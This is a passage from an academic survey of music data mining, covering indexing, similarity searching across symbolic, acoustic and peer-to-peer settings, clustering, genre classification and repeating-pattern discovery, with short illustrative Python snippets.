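    for t in range(1, T):
        for s in range(n_states):
            scores = logp[t - 1] + np.log(trans_p[:, s])
            back[t, s] = int(np.argmax(scores))
            logp[t, s] = scores[back[t, s]] + np.log(emit_p[s, obs[t]])

    path = [int(np.argmax(logp[-1]))]           # backtrack from best end state
    for t in range(T - 1, 0, -1):
        path.append(back[t, path[-1]])
    return path[::-1]

# Two hidden "phrase" states emitting three observable pitch classes.
print(viterbi(obs=[0, 1, 2, 2],
              start_p=np.array([0.6, 0.4]),
              trans_p=np.array([[0.7, 0.3], [0.4, 0.6]]),
              emit_p=np.array([[0.5, 0.4, 0.1], [0.1, 0.3, 0.6]])))
```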
Indices for Music Data

The selection of appropriate features is considered very important in multimedia information retrieval. Meaningful features not only help in the effective representation of objects but also enable the use of indexing schemes for efficient query processing. As far as the symbolic representation is concerned, recent research has proposed that features be represented in string format and has accordingly presented string indices (Hsu, Liu, & Chen, 1998; Lee & Chen, 2000; Chen & Chen, 1998; Liu, Hsu, & Chen, 1999).
These approaches are not easily adapted to multiple features, lack scalability for large music data (Lee & Chen, 2000) and, in general, their string matching proves slower than numeric matching (Lo & Chen, 2003). In order to address these inefficiencies, Lo and Chen (2003) proposed a multi-feature numeric indexing structure that transforms music feature strings into numeric values. As already mentioned, the most common features of acoustic music are produced by time, spectral and wavelet analyses. The coefficients collected from each of these analyses can be indexed in TV-Trees (Lin, Jagadish, & Faloutsos, 1994), locality-sensitive hashing schemes (Yang, 2002) and S-Indexes (Dervos, Linardis, & Manolopoulos, 1997). In addition, Reiss, Aucouturier, and Sandler (2001) compare four different multidimensional indexing schemes for music data: the KD-Tree, the K-Tree, multidimensional quick-sort and the box-assisted method. The authors conclude that the KD-Tree is significantly more efficient than the other methods, especially for high-dimensional data. Finally, the authors in Won, Lee, Ku, Park and Kim (2004) utilise an M-Tree in which a selection of features is stored, thus claiming a 65% gain in space requirements.
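As a small illustration of how a multidimensional index supports query processing over extracted feature vectors, the sketch below builds a KD-tree with SciPy and retrieves the nearest pieces to a query vector under the Euclidean distance. The random feature values are stand-ins for real descriptors; the snippet does not reconstruct any of the cited indexing schemes.

```python
import numpy as np
from scipy.spatial import KDTree

rng = np.random.default_rng(0)
features = rng.random((1000, 8))      # 1000 pieces, 8-dimensional feature vectors
tree = KDTree(features)               # build the multidimensional index once

query = rng.random(8)                 # feature vector extracted from the query
dists, idx = tree.query(query, k=5)   # 5 nearest pieces (Euclidean distance)
print(idx, dists)
```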
Difference from Other Database Types

This section summarises the differences of music databases from other structured or semi-structured ones. The term “semi-structured databases” has emerged to describe databases that have some structure, which is, however, neither regular nor known a priori (Abiteboul, 1997). It is precisely for this reason that most semi-structured data models are self-describing. Following this structure, musical data contain, apart from the main data corpus, textual metadata. One standard such protocol is the ID3-tag for mp3 files. Another emerging standardisation effort in this direction is MPEG-7 (ISO/IEC, 2003),
formally named “Multimedia Content Description Interface,” which describes multimedia content. Nevertheless, we focus on research methods oriented towards the content, which refers to the unstructured data in music databases (for this reason, we use the term music database to refer to this unstructured part). The aforementioned differences are also reflected in the methods that have been employed for data management. In particular, for indexing and querying semi-structured databases, Abiteboul (1997) describes several solutions, which differ considerably from the requirements and solutions presented in the previous section. Relational databases could be involved in the process of managing music data, but only when abstract data types (ADTs) are provided. This corresponds to an object-relational DBMS. In fact, such a system for managing sequences has been developed (Seshadri, Livny & Ramakrishnan, 1996). Although one may consider the option of storing MIDI sequences (or even acoustic ones) within such a system, the peculiarities of music data present very different challenges (for instance, as mentioned, very specialised indexing solutions have been developed for music query processing, in contrast to the standard ones used by object-relational systems). For this reason, this direction has not been followed in related work.
SIMILARITY SEARCHING

As a result of the rapid developments in the WWW, users are able to search for music information among various and large amounts of music data (this is especially popular within P2P systems). This reveals the need for the development of effective similarity-searching methods for music data. Additionally, another significant area where similarity searching is applied is CBMIR systems. Similarity searching in music data differs from searching other types of data in the following respects:
(a) users may perceive the notion of similarity between music pieces in different ways;
(b) similarity-searching queries may be posed in an ad hoc manner (e.g., querying by humming), which brings the need for high tolerance against inconsistencies; and
(c) the data representation (symbolic or acoustic) influences the design of similarity-searching algorithms.

The importance of similarity searching stems from its special role as a primitive for other data mining tasks, like information retrieval, clustering and classification.
Perception of Similarity in Music Data

The stimuli received by a human observer lead to the experience of the event that produced these stimuli, through the interpretation process of the brain. The reception made through the five senses available to humans is the sole contributing channel of information. The final representation, in the human brain, of the event that produced the stimuli bears little direct relation to what the sensory transducers received, as it is subject to extended further processing by the brain (Shepard, 1999). Accordingly, cognitive psychology studies the final representation corresponding to the perceived stimuli. Music, being a physical stimulus as well, is amenable to the very same extended brain processing after being received by the acoustical8 system. Thus, musical cognition is to a certain degree subjective (perception ambiguity), while numerous preferred or habitual ways of music cognition/listening do exist. Based on the Gestalt Laws of Grouping, a number of principles exist by which people organise isolated parts of a visual or acoustic stimulus into groups or whole objects. There are five main laws of grouping: proximity, similarity, continuity, closure and common fate. All of these laws fall under a sixth law, that of simplicity.
Although Gestalt laws are usually applied to visual stimuli, their application to other senses, such as the auditory, is well known. According to the Gestalt laws, during the experience of music listening, humans do not hear a series of disconnected or random tones. Music is perceived as a whole by means of sound-relation-based pitch similarity, time proximity and other factors. Music perception can lead to the identification of melodies, patterns and forms. Recent work by McAdams et al. (2004) suggested that music similarity is determined based on surface features of the musical material. These findings are also supported by numerous previous works in the field. Additionally, the listener’s sensitivity to these features is not related to musical education, apart from the terminology used in order to express the similarity or difference. The work considers as surface features duration/rhythm, pitch/melody, timbre, gesture, texture, articulation and, to a lesser degree, dynamics and harmony, although some of these features may overlap to some extent. Additionally, based on studies that have been conducted on what people attend to while detecting similarity, musicians initially observed dynamics, art and texture and then noticed pitch height and contour; non-musicians’ attention was first drawn to dynamics and art, while texture and pace were subsequently noticed (Lamont & Dibben, 2001). Musical recognition is greatly affected by the ability of the listener to detect different levels of similarity in different musical elements. Studies on response times in dissonant and consonant differentiation showed that dissonant chords are distinguished faster than consonant ones, while musical training had a great effect on the number of correct responses (Bigand, Madurell, Tillmann, & Pineau, 1999). However, in experimentation on chord similarity perception, experience did not seem to have an effect on perception (Hubbard, 1996).
The mood or emotional atmosphere evoked when listening to a musical piece was shown by McAdams et al. (2004) to be related to musical similarity. In the perception of musical emotion, timbre, tempo, pitch and rhythm are of critical importance. Fast tempos are regarded as happy and joyful, while slow tempos tend to be considered sad or gloomy (White, 2004). A more or less similar effect appears with pitch, with high and simple pitches (melodies) producing a feeling of happiness, and lower and more complex pitches (melodies) a feeling of sadness. The combination of rhythm and pitch is known to affect the degree to which a musical piece is perceived as scary (Schellenburg, Krysciak, & Campbell, 2001; White, 2004).
Similarity Searching for Symbolic Data

Methods for MIDI Representation

In symbolic music data, the features of music are available in some form, as already mentioned, and their extraction reduces to n-dimensional strings of the desired n features. Accordingly, the literature has long used string processing techniques and indices for similarity searching in symbolic music data. Research addresses both monophonic and polyphonic symbolic data. A number of approximate string matching techniques for musical data, both monophonic and polyphonic, have been extensively studied (Clifford & Iliopoulos, 2004; Cambouropoulos et al., 1999; Crawford, Iliopoulos, & Raman, 1998). Despite the fact that approximate string matching has been widely utilised in various fields of computer science, the approximation methods were not devised for the peculiarities of musical data. Optimal solutions for exact matching proposed by Crawford, Iliopoulos and Raman (1998) are the Knuth-Morris-Pratt algorithm and variants of the Boyer-Moore algorithm.
As far as approximate matching is concerned, Clifford and Iliopoulos (2004) and Cambouropoulos et al. (1999) propose, as options, the δ-, γ- and (δ,γ)-approximation. In δ-approximation, “two strings p and t are δ-approximate if and only if they have the same length, and each value of p is within δ of its corresponding value in t” (Clifford & Iliopoulos, 2004). In γ-approximation, p and t must have equal length and, additionally, a sum of absolute differences between corresponding values less than or equal to γ. Finally, for p and t to be (δ,γ)-approximate, they must be both δ- and γ-approximate. The best complexity of these algorithms, in general, is O(nm/w), with w being the computer word size. Another approach for approximate matching is δ- and γ-matching using fast Fourier transforms, with respective complexities of O(δn log m) and O(σn log m), σ being the size of the alphabet. Additionally, δ-matching can also be reduced to two instances of the problem known as less-than matching (Amir & Farach, 1995), with the complexity given therein. In this case, for p and t we require all the values of p to be less than or equal to the corresponding ones in t. String matching techniques have also been proposed for a number of other musicological problems, such as approximate matching with gaps, approximate repetitions and evolutionary chain detection (Iliopoulos, Lemstrom, Niyad, & Pinzon, 2002). In musical patterns, restatement with a certain degree of spontaneity or differentiation is rather common; thus, searching for notes that do not appear successively is in some cases required. A solution with bounded gap size runs in O(nm) time (Clifford & Iliopoulos, 2004). The problem of approximate repetitions is formulated as follows: “Given a music sequence S, an approximate repeating pattern P is an approximate subsequence of S that appears at least twice in S.” The exact repetition problem has O(n log m) complexity, while approximate δ-, γ- and (δ,γ)-matching solutions require O(n²) time.
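The δ- and γ-criteria quoted above translate directly into code. The following sketch only checks the definitions for two equal-length pitch sequences; it does not implement the optimal algorithms discussed in the cited work.

```python
def delta_approx(p, t, delta):
    """p and t are delta-approximate: equal length and every pairwise
    absolute difference is at most delta."""
    return len(p) == len(t) and all(abs(a - b) <= delta for a, b in zip(p, t))

def gamma_approx(p, t, gamma):
    """p and t are gamma-approximate: equal length and the sum of absolute
    differences is at most gamma."""
    return len(p) == len(t) and sum(abs(a - b) for a, b in zip(p, t)) <= gamma

def delta_gamma_approx(p, t, delta, gamma):
    return delta_approx(p, t, delta) and gamma_approx(p, t, gamma)

# Two pitch sequences (MIDI note numbers) differing by a small ornament.
print(delta_gamma_approx([60, 62, 64, 65], [60, 63, 64, 65], delta=1, gamma=2))
```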
In order to address the issue of similarity in polyphony, two main approaches exist. The first consists of polyphonic reduction to monophony or homophony, followed by the application of monophonic similarity algorithms, while in the second, specially designed similarity algorithms operate directly on polyphonic data (Liu et al., 2003). In the direction of specially designed similarity algorithms for polyphonic data, Clifford and Iliopoulos (2004), opting for exact matching of a pattern distributed horizontally across a sequence of notes, proposed the use of a modified shift-or algorithm with O(|Σ| + m) + O(N) complexity, where |Σ| is the number of distinct pitches, m the size of the pattern and N the length of the original score. For the case of approximate matching, the same work suggests a modified Wu-Manber algorithm, with the approximate distance defined using the edit distance for each character. Research by Szeto et al. (2003) suggests the extraction of streams, based on the music perception theory that music is perceived in groupings. The proposed methodology separates each musical note, according to its pitch value and timing, into event vectors and subsequently clusters these vectors, producing streams. Thus, polyphony reduces to the problem of clustering. In Doraisamy and Ruger (2004), the authors propose an n-gram construction with the use of sliding windows that include events made of pitches with the same or similar onset times. Pickens et al. (2003) deal with polyphony by ignoring all duration information for every note in the score and then retaining, at each new note onset, all the notes that also begin at that onset.
Methods for CMN Representation

Most of the research in MIR to date is concerned with music in the acoustic and symbolic MIDI file representations. However, the symbolic representation, as already mentioned, also includes music in the form of notation, especially CMN. The use of CMN is of great importance to music libraries and to those musically trained.
The number of musical pieces in music notation included solely in the U.S. Library of Congress is believed to exceed six million (Byrd, 2001). Thus, the use of mechanical assistance for IR in these collections can be invaluable. Of the many factors impeding the evolution of CMN-based MIR, the most hampering are the complexity of CMN, and consequently of the tools required to process it, as well as the unavailability of a standardised CMN format. Initial work in the field could only handle simple monophonic music (Maidín, 1998), while in some cases the query had to be in acoustic format (Bainbridge, 1998). Commercial applications have been available, such as Finale (www.finalemusic.com), that can perform searches by content in CMN (though searching is limited to a single score at a time), as well as find the next match for certain Boolean criteria. The latest developments in commercial packages, such as Nightingalesearch (Byrd, 2001), have overcome the previously mentioned impediments, while offering matching based on pitch and/or duration, with approximate matches under certain tolerance conditions. However, Nightingalesearch has numerous shortcomings, the most important of which is that the supported music files are proprietary to the Nightingale (AMNS, 2000) software.
Similarity Searching for Acoustic Data

In similarity searching in acoustic musical data, feature extraction from the music signal produces the required mapping on which similarity functions as well as speed-up indexing schemes operate. Related work to date on acoustic-data/acoustic-query content-based MIR systems is limited. Yang (2002) proposes a spectral indexing algorithm for CBMIR. Its feature-extraction process attempts to identify distinctive notes or rhythmic patterns.
The features are used to construct “characteristic sequences,” which are then indexed in a probabilistic scheme, locality-sensitive hashing (LSH). The LSH scheme allows both false positive and false negative matches, which are compensated for in a later step based on the uniformity in time of music tempo changes. Experimental results indicate high retrieval accuracy for different similarity types. In Won et al. (2004), the authors propose a CBMIR system that is mainly oriented towards servicing different types of queries. The acceptable query types include audio files, common music notation as well as Query-By-Humming (QBH). The MIDI format is used as an intermediate music object representation. The selection of features is called the “representative melody” and is registered into an M-tree structure, in which melodies are inserted based on their average length and pitch variation, together with melody signatures representing the variation pattern. The distance used is a time-warping function. Preliminary results indicate a 65% gain in space requirements when using the collection of features instead of the whole melodies. As far as the work in Won et al. (2004) is concerned, its main disadvantage is the assumption that the user’s query must include at least one of the parts gathered in order to create the “representative melodies”; while this might work for QBH, it might not for a random piece of a music file included in the index, especially a small one. In addition, polyphonic music transcription is known to be very difficult and to perform poorly (Yang, 2002; Pickens, 2004). Regarding the work in Yang (2002), its feature selection mechanism is oriented towards identifying different types of similarity in music pairs. Additionally, the selected features can lead to false negatives, which have to be addressed in a post-processing step. Finally, Yang (2002) uses a specialised indexing mechanism. The approach proposed by Karydis et al. (2004) presents a feature extraction method based on the first few DFT coefficients of the audio file (sequence).
The extracted features are grouped by minimum bounding rectangles (MBRs) and indexed by means of a spatial access method. Given a range query and some results, the authors present a false-alarm resolution method that utilises a reverse-order schema while calculating the Euclidean distance between the query and the results, in order to avoid costly calculations. Comparative evaluation against an existing algorithm shows a significant reduction in execution times. The proposed scheme does not introduce false negatives, according to the similarity model used, and, more importantly, it uses general-purpose indexes (R-trees), which allow for a direct implementation in existing RDBMSs.
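A minimal sketch of DFT-based feature extraction in this spirit is given below: the signal is cut into fixed-size windows and the magnitudes of the first few DFT coefficients of each window are kept as a feature vector. It follows the general idea only; the exact windowing, normalisation and MBR grouping of Karydis et al. (2004) are not reproduced.

```python
import numpy as np

def dft_features(signal, window=1024, n_coeffs=4):
    """One feature vector per non-overlapping window: the magnitudes of the
    first n_coeffs DFT coefficients (the DC term is skipped)."""
    feats = []
    for i in range(len(signal) // window):
        frame = signal[i * window:(i + 1) * window]
        spectrum = np.fft.rfft(frame)                    # real-input DFT
        feats.append(np.abs(spectrum[1:n_coeffs + 1]))   # skip DC, keep n_coeffs
    return np.array(feats)

# The Euclidean distance between the feature sequences of two clips can then
# serve as the similarity measure for range queries.
sr = 22050
t = np.arange(sr) / sr
clip = np.sin(2 * np.pi * 220 * t) + 0.3 * np.sin(2 * np.pi * 440 * t)
print(dft_features(clip).shape)       # (21, 4): 21 windows, 4 coefficients each
```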
Similarity Searching Methods in P2P Networks

P2P systems are a rapidly developing area. Searching therein for music information9 presents additional requirements in comparison to the customary client-server model. The size of the data transferred to propagate and resolve a query, the CPU burden produced at each peer to resolve a query, as well as the underlying structure of the P2P network and the searching scheme adopted, are some of the most important factors that need to be taken into consideration. In particular, even for compressed acoustic data (e.g., mp3 and wma), the traffic produced solely to propagate the query by a simple flooding algorithm is prohibitive. Thus, similarity searching in P2P networks preferably develops in more than one step, using samples of various granularities. That is, only when a coarse-grained (small-size) representation of the query returns a match does the querying peer send a more fine-grained (and larger) query. Additionally, acoustic data also require increased CPU processing in order to perform similarity functions. Since P2P networks typically consist of computers that are used for purposes other than the P2P application alone, a CPU resource protection mechanism must exist in order to ensure that a queried computer primarily allocates CPU according to its user’s needs (Yang, 2003).
P2P networks can be classified, based on the control over data location and network topology, as unstructured, loosely structured and highly structured (Li & Wu, 2004). Unstructured P2P networks follow no rule regarding where data is stored, while the network topology is arbitrary (Gnutella). Loosely structured P2P networks do not have precisely determined data locations and network architecture (Freenet). Finally, in highly structured networks, data storage and network topology are explicitly defined (Chord). What is more, P2P networks can also be classified according to the number of central directories of document locations: centralised, hybrid and decentralised. Centralised networks maintain a central directory in a single location (Napster), hybrid networks maintain more than one directory in super-peers (Kazaa), while in decentralised networks (Chord) no central directory is kept. Karydis et al. (2005) study several similarity searching algorithms for acoustic data in unstructured P2P networks. The searching schemes employed include brute-force flooding (BFS), the quantitative probabilistic >RES (Yang & Garcia-Molina, 2002), the qualitative ISM (Kalogeraki, Gunopulos, & Zeinalipour-Yazti, 2002) and numerous others (Li & Wu, 2004). In the case of the >RES algorithm, the query peer Q propagates the query q to the subset of k of its neighbour peers that returned the most results during the last m queries. Thus, the similarity search starts from the parts of the network that are most probably larger and then proceeds with the algorithms discussed in the previous sections, according to the format of the music file. In the ISM approach, for each query a peer propagates the query q to the peers that are more likely to reply to it, based on a profile mechanism and a relevance rank. The profile is built and maintained by each peer for each of its neighbouring peers. The information included in this profile consists of the t most recent queries with matches, their matches, as well as the number of matches the neighbouring peer reported.
The relevance rank function is computed by comparing the query q to all the queries for which there is a match in each profile. In structured P2P networks, the common searching scheme is based on distributed hash tables (DHTs). In such systems, each node is assigned a region in a virtual address space, while each shared document is associated with a value (id) in this address space. Since in highly structured networks data storage and network topology are explicitly defined, a shared document is stored at the node within whose address space the document’s id falls. Thus, locating a document requires only a key lookup at the node responsible for the key. Despite the great acceptance of DHT P2P networks (Chord, Pastry, CAN, Koorde, Viceroy, etc.), hashing does not support range queries.
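The neighbour-selection rule of the >RES scheme described above is easy to state in code: rank the neighbours by the number of results they returned for the last m queries and forward the query to the top k. The sketch assumes each peer keeps such per-neighbour statistics; it is a schematic illustration, not the implementation evaluated in the cited work.

```python
def res_select_neighbours(history, k, m):
    """history maps neighbour id -> list of result counts, most recent last.
    Return the k neighbours with the most results over the last m queries."""
    totals = {peer: sum(counts[-m:]) for peer, counts in history.items()}
    return sorted(totals, key=totals.get, reverse=True)[:k]

# Forward the query to the 2 best-performing neighbours of the last 3 queries.
history = {"peer_a": [0, 2, 5], "peer_b": [1, 0, 0], "peer_c": [4, 3, 1]}
print(res_select_neighbours(history, k=2, m=3))   # ['peer_c', 'peer_a']
```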
CLUSTERING

Clustering in music data has contributed techniques to automatically organise collections of music recordings in order to lessen human documentation efforts. Therefore, clustering algorithms are used to detect groups among music pieces in cases where further information (e.g., genre, style, etc.) is not available or not required to be predefined, that is, for the data-driven categorisation of music styles.

Hierarchical Clustering

Hierarchical clustering is renowned for its usage in multidimensional dataset pattern detection. Analysis based on hierarchical clustering is a statistical method for the identification of groups of data (clusters) that indicate relative homogeneity, on the basis of measured characteristics. The analysis begins with each piece of data in a separate cluster and develops by iteratively combining clusters into broader ones, aiming at a reduction of their number and finishing once a desired quantity of clusters is reached. There are two types of hierarchical clustering algorithms for building a tree from an input set S: the agglomerative approach (bottom-up) and the divisive approach (top-down). The former is the most common approach, and its process begins with sets of one element that are subsequently merged until S is obtained as the root. In the latter, a recursive partitioning of S occurs until sets of one element are reached. Recent work on hierarchical clustering for music databases by Lampropoulos et al. (2004) utilises acoustic data, while the extracted features are based on spectral analysis and tempo. In detail, the spectral features extracted are the mean centroid, mean roll-off, mean flux, zero-crossing and short-time energy. The metrics used therein are the Euclidean distance and the cosine distance. The clustering algorithm for n data points develops in four steps (a minimal sketch is given after the list):

1. initially, each data point occupies a cluster of its own;
2. then, for a desired number of k clusters: if the number of available clusters is k, stop; otherwise find the pair of clusters with the highest similarity value;
3. merge these clusters, decrease the cluster number by one and re-compute the distances between the new cluster and all existing clusters; and
4. finally, repeat the procedure from step 2, until all items are clustered into a single cluster of size n.
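The following minimal sketch of the agglomerative procedure above merges the two clusters whose centroids are closest (one possible similarity choice) and stops when k clusters remain; it is an illustration of the four steps rather than the method of Lampropoulos et al. (2004).

```python
import numpy as np

def agglomerative(points, k):
    """Merge the two closest clusters (by centroid distance) until k remain.
    Returns a list of clusters, each a list of point indices."""
    clusters = [[i] for i in range(len(points))]       # step 1: singletons
    while len(clusters) > k:                           # step 2: stop at k
        best, pair = np.inf, None
        for a in range(len(clusters)):
            for b in range(a + 1, len(clusters)):
                d = np.linalg.norm(np.mean(points[clusters[a]], axis=0) -
                                   np.mean(points[clusters[b]], axis=0))
                if d < best:
                    best, pair = d, (a, b)
        a, b = pair                                    # steps 3-4: merge, repeat
        clusters[a] += clusters[b]
        del clusters[b]
    return clusters

pts = np.array([[0.0, 0.0], [0.1, 0.0], [5.0, 5.0], [5.1, 5.0]])
print(agglomerative(pts, k=2))   # [[0, 1], [2, 3]]
```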
A variation of the hierarchical clustering approach is utilised by Hoos, Renz and Gorg (2001) in order to reduce search effort, by purging some of the data that do not match the query and, more importantly, by identifying promising candidate data. This approach utilises a modified hierarchical clustering, resulting in a balanced tree where each node has up to 32 children.
In order to additionally speed up the search within this tree, each stored node is assigned three bit matrices, the entries of which indicate whether the transition probabilities in the probabilistic model for the cluster corresponding to that node exceed a specific value. The use of these matrices supports the rapid selection of the most promising sub-cluster at each step at the internal nodes during the search. The introduction of the previously mentioned mechanisms serves to prune large sections that cannot include an exact match (since the corresponding transition probabilities are null), as well as to guide searches to promising candidate pieces as fast as possible.
Other Types of Clustering

The remaining categories of clustering, apart from hierarchical, consist of k-clustering (partitioning), self-organizing maps (SOMs) as well as hybrid solutions. The target of k-clustering is the identification of the best set of k cluster centroids and the assignment of each instance to its nearest centroid, a process that additionally determines the structure of the partition. A SOM is a group of several connected nodes mapped into a k-dimensional space following some specific geometrical topology (grids, rings, lines, etc.). The nodes are initially placed at random, while subsequent iterative adjustment occurs based on the distribution of the input along the k-dimensional space. The following are some prominent research works that fall within the hybrid category previously mentioned. In work by Pienimäki et al. (2004), polyphonic music is segmented into phrases using, initially, a monophonic reduction that retains only the highest-pitch notes and, subsequently, an existing melodic phrase algorithm. The hierarchical structure proposed therein is an amalgamation of paradigmatic (Cambouropoulos & Widmer, 2000) and collection (Eerola, Järvinen, Louhivuori, & Toiviainen, 2001) clustering. In paradigmatic clustering, each single document inserted is analysed in order to identify its inner structure, while collection clustering attempts to cluster a given collection of documents.
Initial clustering occurs at the paradigmatic level, where variants of a common phrase are clustered together based on a similarity matrix, in which distances are measured by harmonic and melodic edit distances. Each document is described using adjacency lists; each such list is associated with a document and stores the results of the paradigmatic and surface-level analyses of the corresponding document. At the final step, clustering of the whole collection occurs using the adjacency lists. Another interesting approach to music clustering is proposed by Cooper et al. (2003). The approach suggested therein is based on methods developed for segmenting still images. Initial time-domain analysis transforms the musical data into features, while similarity is based on the cosine distance. The pairwise similarity of all combinations of features for each music file is computed, leading to a “partial time-indexed similarity matrix” (Cooper & Foote, 2003) for the detection of audio segment boundaries. The following step includes clustering of the calculated segments by means of similarity analysis, which consists of the identification of time-separated repeated segments as well as of cases of over-segmentation errors. Based on the segmentation boundaries, the full similarity matrix can be estimated. Then, segment clustering occurs based on singular value decomposition. The proposed scheme, instead of computing the full sample-indexed similarity matrix, is oriented towards segment-level clustering, achieving a gain in CPU load. Finally, Cilibrasi et al. (2003) propose a clustering scheme based on musical feature compression. The features utilised in Cilibrasi, de Wolf, and Vitanyi (2003) are note-on, note-off, average volume and modal note, extracted from MIDI files. The average volume stems from the average value of note velocity in each track, while the modal note refers to the most frequently occurring pitch in each track. The similarity measure used (Li, Badger, Chen, Kwong, Kearney, & Zhang, 2001; Li & Vitanyi, 2001/2002; Li, Chen, Li, Ma, & Vitanyi,
2003) is based on Kolmogorov’s complexity. In order to cluster the music data, the proposed method consists of computing a phylogeny tree based on the previously mentioned distance between any two music files. The sub-trees of the phylogeny tree constitute the clusters that are created based on closeness of objects stored therein.
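Kolmogorov complexity itself is uncomputable, so compression-based schemes approximate it with a real compressor. The sketch below computes the widely used normalised compression distance with zlib over symbolic note strings; it illustrates the idea behind such distances and is not the exact measure or feature set of Cilibrasi et al. (2003).

```python
import zlib

def ncd(x: bytes, y: bytes) -> float:
    """Normalised compression distance: smaller means more similar."""
    cx, cy = len(zlib.compress(x)), len(zlib.compress(y))
    cxy = len(zlib.compress(x + y))
    return (cxy - min(cx, cy)) / max(cx, cy)

# Encode each track as a byte string of note events (toy pitch sequences here).
a = b"60 62 64 65 67 65 64 62 " * 20
b = b"60 62 64 65 67 65 64 60 " * 20
c = b"71 45 18 90 33 27 64 02 " * 20
print(ncd(a, b) < ncd(a, c))   # near-identical melodies compress better together
```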
CLASSIFICATION

Similar to clustering, classification aims at grouping similar documents together. The main difference between clustering and classification is that clustering is a fully automated process requiring no preparation steps or maintenance; classification, on the other hand, generally requires the manual specification of categories before execution, and the updating of these categories as new documents are added to the collection. Many different features can be used for music classification, e.g., reference features (title and composer), content-based acoustic features (tonality, pitch and beat), symbolic features extracted from the scores and text-based features extracted from the song lyrics. In this section we focus on content-based features and music genre classification. The latter concerns the classification of music from different sources with respect to genres in general, and styles in particular.
Classification with Content-Based Features

In content-based classification, physical features, such as pitch, duration, loudness and time/spectral-domain features, as well as perceptual features, such as timbre, its salient components and the music properties humans perceive in sound, are provided to the classification process. The output of a common classification engine may include retrieved music data similar to one or more of the supplied features, based on previous training of the engine
on feature classes or by general similarity. Two cases of recent research in the area follow. The system proposed by Wold et al. (1996) utilises as features loudness, pitch, brightness, bandwidth and harmonicity. Initially, n features are extracted from the music file, producing an n-dimensional vector. The training of the system can be done either by directly defining constraints on the values of the feature vector (e.g., a specific value for pitch) or by supplying feature vectors and assigning them to a specific class manually. For each manually defined class, the proposed methodology calculates the mean vector and covariance matrix. Should a new audio file need to be classified, its feature vector is calculated and, using the Euclidean distance, compared to each class’s threshold in order to assess the degree of similarity. In the case of mutually exclusive classes, the new file is assigned to the class to which its distance is smallest. In order to define the quality measure of a class, the magnitude of the covariance matrix can be used. An alternative approach by Li (2000) is based on a classification method called the nearest feature line (NFL). The NFL utilises the information provided by multiple prototypes per class, in contrast to nearest neighbour (NN) classification, in which each prototype is compared to the query individually. As far as the features used to represent the musical data are concerned, Li considers perceptual and cepstral features as well as their combinations. The NFL’s key steps are the interpolation or extrapolation of each pair of prototypes belonging to the same class by a linear model and, subsequently, the generalisation of the prototypes by the feature line passing through the two points. The feature line’s role is to provide information about variants of the two sounds; thus, the capacity of the prototype set is expanded. The classification is achieved using the minimum distance between the query’s feature point and the feature lines.
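The geometric core of the NFL classifier is the distance from the query's feature point to the line passing through two prototypes of the same class. A minimal sketch of that computation, and of choosing the class whose closest feature line is nearest, follows; it applies the textbook point-to-line projection and is not Li's original implementation.

```python
import numpy as np

def feature_line_distance(q, p1, p2):
    """Distance from query point q to the (infinite) line through p1 and p2."""
    direction = p2 - p1
    t = np.dot(q - p1, direction) / np.dot(direction, direction)
    foot = p1 + t * direction               # projection of q onto the line
    return np.linalg.norm(q - foot)

def nfl_classify(q, prototypes):
    """prototypes maps class label -> array of prototype feature vectors."""
    best_label, best_dist = None, np.inf
    for label, protos in prototypes.items():
        for i in range(len(protos)):
            for j in range(i + 1, len(protos)):
                d = feature_line_distance(q, protos[i], protos[j])
                if d < best_dist:
                    best_label, best_dist = label, d
    return best_label

protos = {"piano": np.array([[0.1, 0.2], [0.2, 0.1], [0.15, 0.3]]),
          "rock":  np.array([[0.8, 0.9], [0.9, 0.7], [0.7, 0.8]])}
print(nfl_classify(np.array([0.18, 0.22]), protos))   # "piano"
```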
Musical Genre Classification

Music can be divided into genres in many different ways, and a genre may contain myriad different styles. These classifications are often arbitrary and controversial and, furthermore, closely related styles often overlap. Herein we present issues related to genres with respect to classification. In order to categorically describe music, one can use musical genres. Their ability to structure the vast amounts of music available in digital form is widely exploited on the Web as well as in offline collections, and they have thus become important for MIR. As previously mentioned, the process of genre categorisation in music can be divided into two steps: feature extraction and multi-class classification. During feature extraction, the system develops a representation of the music data to be classified, on which the subsequent classification is based. The extracted features need to be musically coherent, compact in terms of size and effective, in order to facilitate the classification. Research reported on music genre classification is rather limited. Li et al. (2003) proposed the use of DWCHs (based on wavelet histograms) as features to represent music and classified them using the one-versus-the-other method. Tzanetakis and Cook (2001) proposed a comprehensive set of features for the direct modelling of music signals and used them for musical genre classification using k-nearest neighbours and Gaussian mixture models. In work by Deshpande et al. (2001), Gaussian mixtures, support vector machines and nearest neighbours are used to classify music, based on timbral features, into rock, piano and jazz. Finally, Soltau et al. (1998) proposed a music classification system using a set of abstract features utilising temporal structures, as well as their classification based on artificial neural networks.

PATTERN DISCOVERY

The discovery of repeated structure in music data is a pivotal step in music analysis. Such structures play a crucial role in understanding the construction of a musical piece in terms of musical motifs and themes. A theme (especially in classical music) is a melody that the composer uses as a starting point for development, which may be repeated in the form of variations. Repeating patterns have been considered characteristic signatures of music objects and can serve as a quantitative measure of music similarity (Crawford, Iliopoulos, & Raman, 1998).
Algorithms for Repeating Patterns Discovery

A motif is a minimum pattern that is meaningfully independent and complete within a piece of music. The extent of variation within a theme and its repetition frequency can differ depending on the composer and the type of music. Recent research has focused on searching for motifs using methods that find repeating patterns in symbolic representations of music data (where pitch information is selected as the main music feature). Given a music object S, a repeating pattern P is a subsequence of consecutive elements of S that appears at least twice in S (Hsu, Liu & Chen, 2001). The mining of repeating patterns is described in Hsu et al. (2001), where two algorithms are proposed for the discovery of non-trivial repeating patterns and of the feature melody string. The first algorithm uses a correlative matrix for the extraction of repeating patterns (Hsu et al., 1998), while the second is based on a repeating string-join operation. Experimental results in Hsu et al. (2001) indicate the superiority of the latter algorithm over the correlative matrix approach. Koh and Yu (2001) presented a means of mining the maximum repeating patterns from the melody of a music object using a bit index sequence, as well as an extension for the extraction of frequent note sequences from a set of music objects.
Rolland et al. (2002) described an algorithm for the mining of sequential patterns in music data, which considers several peculiarities of music objects. Nevertheless, the number of repeating patterns may be very large, a fact that burdens their examination by human analysts. Existing research has identified that, among the collection of repeating patterns, the longest ones are those that can be characterised as feature melody strings and are typically those that can yield themes. Karydis et al. (2005) proposed an efficient algorithm for finding the longest repeating patterns, which discovers them by using a fast searching procedure that ascends with respect to pattern length, so as to quickly reach the required patterns. Thus, this algorithm avoids the examination of a large number of intermediate patterns and only considers those patterns that are necessary in order to reach the maximum-length patterns.
